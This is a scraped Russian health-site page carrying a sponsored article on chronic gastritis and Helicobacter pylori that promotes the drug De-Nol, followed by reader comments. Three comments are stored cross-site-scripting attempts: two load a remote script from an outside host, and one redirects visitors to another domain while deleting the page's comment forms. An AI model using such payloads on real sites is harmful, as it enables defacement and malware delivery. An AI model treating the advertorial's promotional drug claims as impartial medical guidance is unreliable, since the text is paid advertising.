Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Хронический гастрит: 3 ша...  >>  Хронический гастрит: 3 шага к выздоровлению
 
Обратная связь
 

Хронический гастрит: 3 шага к выздоровлению

Размер шрифта
21 октября 2014 00:00
  • google_analytics: false
  • Нравится

Вы когда-нибудь замечали у себя такие симптомы, как боль в верхней части живота, изжога, вздутие живота, неприятный привкус во рту? Если нет – вам повезло. Если да – возможно, у вас хронический гастрит. Это и есть первый шаг на пути к избавлению от гастрита – заподозрить заболевание.

Хронический гастрит: 3 шага к выздоровлению

Шаг второй – подтверждение диагноза. Еще в 1983 году стало известно, что основная причина хронического гастрита – бактерия Хеликобактер пилори. Попадая в желудок, эти бактерии проникают сквозь защитный слизистый барьер и прикрепляются к стенке желудка. Там они живут и размножаются, и поскольку организм, ввиду некоторых причин, не способен самостоятельно их уничтожить, борьба организма с бактериями Хеликобактер затягивается на долгие годы. Так и возникает хронический гастрит, длительно текущее воспаление слизистой желудка. Соответственно, чтобы подтвердить диагноз, необходимо обратиться к врачу и провести гастроскопию: она позволит обнаружить очаг воспаления и с помощью специального теста определить наличие в очаге бактерий Хеликобактер пилори.

Шаг третий – лечение. Некоторые считают, что гастрит можно не лечить – мол, поболит и пройдет. Но это не так. Со временем, если лечение не проводится, в области воспаления может образоваться язва или даже раковая опухоль. Но если подобрать правильное лечение, то можно предотвратить эти осложнения, поэтому лечить гастрит совершенно необходимо.

Очень часто для лечения гастрита используют только кислотоснижающие препараты, например антациды и блокаторы протонной помпы. Но у этих препаратов есть важный недостаток: они лишь устраняют симптомы заболевания и не действуют на его причину – Хеликобактер пилори. Именно поэтому кислотоснижающие вещества не предотвращают развитие злокачественных опухолей.

Одним из препаратов, способным бороться с Хеликобактер Пилори, является Де-Нол®. Благодаря своим уникальным свойствам, Де-Нол® не только уничтожает Хеликобактер, но еще образует на поврежденной поверхности (эрозии, язвы) особую защитную пленку, препятствуя попаданию желудочного сока и способствуя тем самым восстановлению слизистой оболочки желудка.

  • Де-Нол® повышает вероятность уничтожения Хеликобактерной инфекции, так как к нему не формируется устойчивости у возбудителя1.
  • Де-Нол® образует защитную пленку на поверхности язв и эрозий2, что способствует заживлению и восстановлению слизистой оболочки желудка.
  • Де-Нол® обладает антибактериальными свойствами, но не является антибиотиком2.
  • Де-Нол® – вяжущее, противовоспалительное, цитопротективное средство, с бактерицидным эффектом2, которое борется с причиной и помогает купировать обострение гастрита.

Помните, что хронический гастрит – весьма опасное заболевание, и чем раньше вы начнете лечение, тем меньше риск осложнений.

Представительство компании «Астеллас Фарма Юроп Б.В.» (Нидерланды), г. Москва

109147, Россия, г. Москва, ул. Марксистская, д. 16. 

Тел.: +7 (495) 737 07 55, факс: +7 (495) 737 07 63

1. Исаков В.А., Домарадский И.В.. Хеликобактериоз. Медпрактика-М. Москва, 2003, стр. 342 – 356.

2. Инструкция по применению лекарственного препарата для медицинского применения Де-Нол® (ПNo012626/01-23.08.10).

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

26 марта 2015 в 13:30

Цитировать   |   Пожаловаться

Подробная информация спасибо, как раз нужно справиться с хеликобактером.. только вот побочных много.., я бы более щадящее предпочла, вообще можно было бы я бы только диетой лечилась

2 - Гость

26 марта 2015 в 16:07

Цитировать   |   Пожаловаться

Я принимала Хелинорм, он подольше действует, зато мягче и без побочных. И диету конечно надо соблюдать. Сейчас никаких проблем, гастрит не заработала) Так что не очень понимаю панику вокруг этих бактерий, раз от них не так сложно избавиться)

3 - Гость

27 марта 2015 в 12:36

Цитировать   |   Пожаловаться

Гость 26 марта 2015 в 13:30
Я принимала Хелинорм, он подольше действует, зато мягче и без побочных. И диету конечно надо соблюдать. Сейчас никаких проблем, гастрит не заработала) Так что не очень понимаю панику вокруг этих бактерий, раз от них не так сложно избавиться)
А какую диету если не секрет?? я стараюсь питаться правильно, но мне кажется этого не достаточно... а в смысле, как именно он действует? результат то есть? 

4 - Гость

27 марта 2015 в 14:24

Цитировать   |   Пожаловаться

Посмотрите диеты при гастрите, очень много есть рецептов и вариантов меню на день. Ну суть основная в отказе от жареного, жирного, острого, кислого и пр. продуктов, которые раздражают и так воспаленную слизистую. Это не так сложно, как кажется, привыкаешь)

Ну у меня после курса прошли симптомы (вздутие, изжога, тошнота). Ну может всё и индивидуально, но я довольна осталась)

5 - Гость

30 марта 2015 в 13:00

Цитировать   |   Пожаловаться

Гость 27 марта 2015 в 14:24
Ну у меня после курса прошли симптомы (вздутие, изжога, тошнота). Ну может всё и индивидуально, но я довольна осталась)
Спасибо за отзыв! Тогда наверно к диете добавлю еще Хелинорм, для большего эффекта, а то уже поскорей хочется эту бяку из себя вывести!

6 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

7 - zzzzzz

30 июня 2015 в 21:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

8 - zzzzzz

30 июня 2015 в 22:26

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

9 - Гость

26 января 2016 в 18:28

Цитировать   |   Пожаловаться

За 3 шага от гастрита, еще и хронического не избавиться.

10 - Elena Kryts

29 января 2016 в 15:03

Цитировать   |   Пожаловаться

Не всегда гастрит - следствие наличия хеликобактер пилори. Я свой гастрит заработала в студенческие годы, когда бутерброды и чипсы, запиваемые газировкой, были самой ходовой едой. Супчики раз в пару дней (в лучшем случае), а про каши я вообще молчу. Так и посадила желудок. Тоже уже несколько лет (во время обострений) пью де-нол, хорошо помогает, единственный минус - цена.

1 | 2 Следующая

Статьи

       
Инфекции могут сделать вас глупым! Как не заболеть?   Как лечить язву   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Как спать с бронхитом
Как курение влияет на вашу кожу

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.